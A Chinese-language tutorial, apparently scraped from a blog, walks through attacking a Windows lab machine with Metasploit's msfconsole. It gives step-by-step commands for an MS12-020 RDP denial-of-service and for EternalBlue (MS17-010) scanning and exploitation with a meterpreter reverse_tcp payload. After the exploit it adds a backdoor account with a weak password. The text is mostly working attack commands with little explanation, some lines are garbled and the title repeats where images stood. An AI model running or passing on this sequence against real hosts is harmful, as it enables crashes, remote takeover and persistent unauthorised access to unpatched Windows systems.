msfconsole利用ms17-010和ms12-020攻击

MS12-020

msfconsole 从终端进入msf框架

msfconsole

msfconsole利用ms17-010和ms12-020攻击

查找漏洞 search 12_020

search 12_020 

msfconsole利用ms17-010和ms12-020攻击

使用该漏洞利用代码

 use auxiliary/dos/windows/rdp/ms12_020_maxchannelids

msfconsole利用ms17-010和ms12-020攻击

查看使用方法

 show options 

msfconsole利用ms17-010和ms12-020攻击

查看靶机的ip地址

ipconfig

msfconsole利用ms17-010和ms12-020攻击

查看靶机开放端口

netstat -ano

msfconsole利用ms17-010和ms12-020攻击

开发3389端口

msfconsole利用ms17-010和ms12-020攻击

msfconsole利用ms17-010和ms12-020攻击

msfconsole利用ms17-010和ms12-020攻击

msfconsole利用ms17-010和ms12-020攻击

msfconsole利用ms17-010和ms12-020攻击

msfconsole利用ms17-010和ms12-020攻击msfconsole利用ms17-010和ms12-020攻击

msfconsole利用ms17-010和ms12-020攻击

msfconsole利用ms17-010和ms12-020攻击

msfconsole利用ms17-010和ms12-020攻击

设置参数

 set RHOST 192.168.74.134 
 set RPORT 3389 

msfconsole利用ms17-010和ms12-020攻击

查看

show options

msfconsole利用ms17-010和ms12-020攻击

攻击

exploit 

msfconsole利用ms17-010和ms12-020攻击

msfconsole利用ms17-010和ms12-020攻击

MS17-010

msfconsole 从终端进入msf框架

msfconsole

msfconsole利用ms17-010和ms12-020攻击

查找MS17-010相关利用代码

search 17_010 

msfconsole利用ms17-010和ms12-020攻击

检测内网中存在漏洞的主机系统

use auxiliary/scanner/smb/smb_ms17_010 show options  

msfconsole利用ms17-010和ms12-020攻击

msfconsole利用ms17-010和ms12-020攻击

查看445端口是否开放

msfconsole利用ms17-010和ms12-020攻击

设置参数

set RHOST 192.168.74.134/24show options  

msfconsole利用ms17-010和ms12-020攻击

run 出现加号可入侵

run

msfconsole利用ms17-010和ms12-020攻击

使用模块进行入侵

search ms17_010

msfconsole利用ms17-010和ms12-020攻击

调用永恒之蓝攻击模块

use exploit/windows/smb/ms17_010_eternalblue show options  

msfconsole利用ms17-010和ms12-020攻击

设置参数

 set RHOST 192.168.74.134 set payload windows/x64/meterpreter/reverse_tcp payload set LHOST 192.168.74.134 show options

msfconsole利用ms17-010和ms12-020攻击

攻击

 run

msfconsole利用ms17-010和ms12-020攻击

创建一个ammin用户

net user admin 123456 /add

msfconsole利用ms17-010和ms12-020攻击

到靶机查看

net user

msfconsole利用ms17-010和ms12-020攻击

参考资料

[win7旗舰版怎么开启3389端口?](win7旗舰版怎么开启3389端口?_百度知道 (baidu.com))

[win7怎么打开端口](win7怎么打开端口-百度经验 (baidu.com))

[Metasploit(MSF)快速使用MS12-020、MS17-010(永恒之蓝)漏洞](Metasploit(MSF)快速使用MS12-020、MS17-010(永恒之蓝)漏洞 - 哔哩哔哩专栏 (bilibili.com))

[关于使用msf渗透攻击Win7主机并远程执行命令的复习]((1条消息) 关于使用msf渗透攻击Win7主机并远程执行命令的复习_LIKEQC的博客-CSDN博客_msf攻击win7)

上一篇:CentOS开启SELinux导致samba无法访问的解决办法


下一篇:Linux samba共享